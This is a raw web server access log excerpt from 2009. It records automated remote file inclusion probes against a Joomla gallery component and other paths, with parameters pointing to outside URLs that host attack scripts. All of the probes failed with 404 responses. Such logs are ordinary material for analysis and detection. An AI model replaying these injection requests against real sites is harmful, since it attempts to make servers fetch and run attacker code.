172.16.1.180 - - [10/Jun/2009:06:33:11 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
77.246.179.52 - - [10/Jun/2009:06:33:14 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
77.246.179.52 - - [10/Jun/2009:06:33:14 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
77.246.179.52 - - [10/Jun/2009:06:33:14 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
124.217.216.86 - - [10/Jun/2009:06:33:28 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.826"
